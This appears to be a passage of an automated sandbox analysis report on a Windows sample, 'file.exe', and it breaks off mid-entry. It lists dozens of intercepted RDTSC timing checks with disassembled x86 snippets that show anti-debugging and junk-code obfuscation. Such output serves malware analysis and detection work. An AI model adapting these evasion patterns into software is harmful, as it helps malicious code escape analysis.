    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366A1B second address: 366A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2FF4F875F6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366A25 second address: 366A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3912B0 second address: 3912B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3912B4 second address: 3912F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F2FF4BC0FD1h 0x0000000f push ebx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391480 second address: 391484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391484 second address: 391493 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FBBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39645A second address: 396479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F87600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F2FF4F87609h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3965B9 second address: 3965C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3965C6 second address: 3965D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F875FCh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 394EA8 second address: 394EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 396730 second address: 396736 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359358 second address: 35935D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C991 second address: 39C997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C997 second address: 39C99B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C99B second address: 39C9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C9A7 second address: 39C9AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CB13 second address: 39CB47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F87608h 0x00000007 jmp 00007F2FF4F87608h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CCC3 second address: 39CCC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CCC7 second address: 39CCD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CCD1 second address: 39CCD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CCD5 second address: 39CCD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CCD9 second address: 39CD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F2FF4BC0FB8h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F2FF4BC0FC5h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CD04 second address: 39CD12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F2FF4F875FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CD12 second address: 39CD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CD1B second address: 39CD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1320 second address: 3A1326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1519 second address: 3A1527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F2FF4F875F6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A17C8 second address: 3A17E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A18B0 second address: 3A18C2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2FF4F875F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A18C2 second address: 3A18D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1982 second address: 3A1999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2FF4F87600h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1F99 second address: 3A1FA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F2FF4BC0FB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A226A second address: 3A226E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A2312 second address: 3A2335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A2335 second address: 3A233A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A25B6 second address: 3A25C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2FF4BC0FB6h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A25C1 second address: 3A25C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A355B second address: 3A3593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 push edx 0x00000009 movzx esi, ax 0x0000000c pop edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F2FF4BC0FB8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b movsx edi, cx 0x0000002e xchg eax, ebx 0x0000002f push ecx 0x00000030 push ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3593 second address: 3A35B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2FF4F87607h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A35B3 second address: 3A35BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2FF4BC0FB6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361AA0 second address: 361AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A6099 second address: 3A60A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2FF4BC0FB6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361AA4 second address: 361AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A97E6 second address: 3A984A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 jmp 00007F2FF4BC0FC2h 0x0000000d pop edi 0x0000000e nop 0x0000000f mov dword ptr [ebp+1247786Ah], ecx 0x00000015 push 00000000h 0x00000017 mov si, 0D70h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F2FF4BC0FB8h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 clc 0x00000038 xchg eax, ebx 0x00000039 jmp 00007F2FF4BC0FBFh 0x0000003e push eax 0x0000003f jp 00007F2FF4BC0FC8h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A95A7 second address: 3A95C9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2FF4F875F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2FF4F87605h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A984A second address: 3A984E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AC070 second address: 3AC077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AC077 second address: 3AC07C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AC07C second address: 3AC082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AF64D second address: 3AF651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE6E9 second address: 3AE6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AF84B second address: 3AF855 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2FF4BC0FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE6ED second address: 3AE6F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AF855 second address: 3AF871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2FF4BC0FC7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AF871 second address: 3AF87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B1834 second address: 3B1841 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AF87F second address: 3AF885 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B1841 second address: 3B189A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F2FF4BC0FC7h 0x0000000c popad 0x0000000d nop 0x0000000e add dword ptr [ebp+122DB3C0h], esi 0x00000014 push 00000000h 0x00000016 sub dword ptr [ebp+122D2B2Eh], edx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F2FF4BC0FB8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 clc 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jnp 00007F2FF4BC0FB6h 0x00000044 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B189A second address: 3B18A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B1A7B second address: 3B1A85 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2FF4BC0FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B39BF second address: 3B39C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B39C4 second address: 3B3A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F2FF4BC0FB8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov bx, 2C00h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov bl, cl 0x00000031 mov bh, 7Fh 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov ebx, ecx 0x0000003c mov eax, dword ptr [ebp+122D14A1h] 0x00000042 adc edi, 24B9348Eh 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F2FF4BC0FB8h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 jns 00007F2FF4BC0FB8h 0x0000006a nop 0x0000006b pushad 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B3A46 second address: 3B3A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F2FF4F87601h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B57AE second address: 3B57BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B698A second address: 3B69D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx edi, di 0x0000000e adc edi, 6E5B634Bh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F2FF4F875F8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 xor edi, 3987B771h 0x00000036 push 00000000h 0x00000038 mov ebx, dword ptr [ebp+122D37A4h] 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B69D2 second address: 3B69D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B69D6 second address: 3B69E0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2FF4F875F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B59C3 second address: 3B59C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B59C9 second address: 3B59D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2FF4F875F6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B78CE second address: 3B78D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F2FF4BC0FB6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8A09 second address: 3B8A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8AED second address: 3B8AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8C16 second address: 3B8C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8C1C second address: 3B8C34 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2FF4BC0FB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jp 00007F2FF4BC0FB6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8C34 second address: 3B8C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8C39 second address: 3B8C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B9D52 second address: 3B9D58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B9D58 second address: 3B9D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBC81 second address: 3BBC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2FF4F875F6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jp 00007F2FF4F875FCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBC97 second address: 3BBC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BAC9D second address: 3BAD09 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2FF4F875FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov di, 5B73h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 or edi, dword ptr [ebp+12461F6Dh] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov ebx, dword ptr [ebp+122D2B24h] 0x0000002b mov eax, dword ptr [ebp+122D06D9h] 0x00000031 movzx edi, di 0x00000034 push FFFFFFFFh 0x00000036 call 00007F2FF4F875FDh 0x0000003b call 00007F2FF4F875FEh 0x00000040 mov edi, dword ptr [ebp+122D2D57h] 0x00000046 pop ebx 0x00000047 pop edi 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F2FF4F875FAh 0x00000050 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BAD09 second address: 3BAD30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2FF4BC0FBBh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BCC50 second address: 3BCC6A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2FF4F875F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F2FF4F875FCh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BCC6A second address: 3BCC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2FF4BC0FBFh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBDEF second address: 3BBDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBDF4 second address: 3BBE9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F2FF4BC0FC7h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F2FF4BC0FB8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov ebx, esi 0x0000002a push dword ptr fs:[00000000h] 0x00000031 or dword ptr [ebp+122D2A79h], edx 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F2FF4BC0FB8h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 or dword ptr [ebp+122D2A79h], edi 0x0000005e mov eax, dword ptr [ebp+122D0161h] 0x00000064 mov bx, di 0x00000067 push FFFFFFFFh 0x00000069 jl 00007F2FF4BC0FCDh 0x0000006f jmp 00007F2FF4BC0FC7h 0x00000074 push eax 